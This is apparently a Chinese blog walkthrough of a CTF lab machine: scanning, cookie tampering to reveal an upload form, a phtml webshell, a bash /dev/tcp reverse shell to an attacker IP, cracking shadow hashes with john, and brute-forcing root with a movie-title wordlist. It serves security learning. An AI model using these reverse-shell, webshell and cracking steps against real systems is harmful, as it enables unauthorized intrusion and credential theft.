文章目录
信息收集
开局依旧是先扫一下网段看看IP是多少
nmap -sP 192.168.2.1-255
继续对这台主机进行端口等信息的收集
nmap -p- -sV -sC 192.168.2.18
http和ssh服务开了,打开看看
感觉没什么可利用的地方,扫一下目录
wfuzz -c --hc=404 -t200 -w directory-list-2.3-medium.txt http://192.168.2.21/FUZZ.txt
发现两个页面
license如下,感觉没啥用
看一下notes.txt,只能使用ssh keys,然后他叫Dave,还有备份
尝试用Dave Dave进行ssh连接无果,继续收集信息
尝试抓下包看看,这个cookie的值明显是加密了,第一直觉是base64,解密看看
解密出来是false,那么如果改成true会怎么样呢
把cookie的值改为true的base64加密值,出现了一个upload
漏洞利用
那么直接传马试试看,有过滤,使用php7上传成功了,但是不解析
换个phtml看行不行,成功
反弹一下shell
bash -c 'exec bash -i &>/dev/tcp/192.168.2.18/3333 <&1'
用户目录下有user.txt,但是没用权限获取
之前在notes.txt里面提到了备份,查查看备份的情况
本来想把这个文件放到网站根目录,但是权限不够
那就在这里重新启动一个http服务
python3 -m http.server
成功下载到备份文件
打开看看,这暗示够明显了,放到john the ripper里面去破解一下
先把这两个文件合并成一个文件
unshadow passwd shadow > unshadow
john --wordlist=字典 unshadow --format=crypt
成功爆破出密码
拿到第一个flag
权限提升
下一步就是提权了,当前目录下还有一个oldpasswords的文件,看看
得到了四个密码
四个密码全都错了
换个思路看看,先看一下哪些命令有root权限
find / -user root -perm -4000 -print 2>/dev/null
只有mount是可能存在利用点的,但是没用sudo这个命令,这条路也不行了。
回过头来看看那四个密码,全都是电影的名字,到这里思路就断了,看了tomkraz师傅的WP,这四个密码都是流行的动画电影,那么去网上找找流行的动画电影的名字
这里附上tomkraz师傅收集的字典和脚本
https://raw.githubusercontent.com/therealtomkraz/ctfscripts/main/top_100_animated_movies.txt
还有main/verifysuroot.py
下面就只要把这个字典和脚本放上去执行就行了
curl http://192.168.2.18:8000/ssh.py -o ssh.py
curl http://192.168.2.18:8000/ssh.txt -o ssh.txt
python3 ssh.py --wordlist ssh.txt
发现了正确密码,直接登录,拿到flag
总结
总结:前期的目录扫描不必多说,扫到notes.txt后拿到有备份和可能存在文件上传点的信息,还一度尝试过直接用Dave登录SSH,接下来就是第一个点,要发现隐藏在首页的文件上传点,把cookie改为true的base64编码值,这里的上传过滤很简单就饶过了,拿到webshell后尝试提权无果后发现备份文件然后破解,接下来就是动漫电影当密码的爆破过程了。总的来说除了最后一步有点骚之外,其他的都还是比较流畅的,这里又一次见识到了社工的力量。
小心思:球球各位给个三连吧!😉 会点赞关注收藏的大帅哥大漂亮们也许已经够帅气和美丽了,但是根据科学研究调查发现,给博主三连能让各位颜值更上一层楼,祝各位祝财源广进,进德修业,业精于勤,勤而补拙,卓尔不群,群英荟萃,摧枯拉朽,朽木生花,花辰月夕,夕寐宵兴,兴旺发达,达士通人,人定胜天!
你们的支持就是继续创作的最好动力~博主会继续坚持更新,保证让最简单普通的语言把每个知识点讲清楚,大家一起进步!
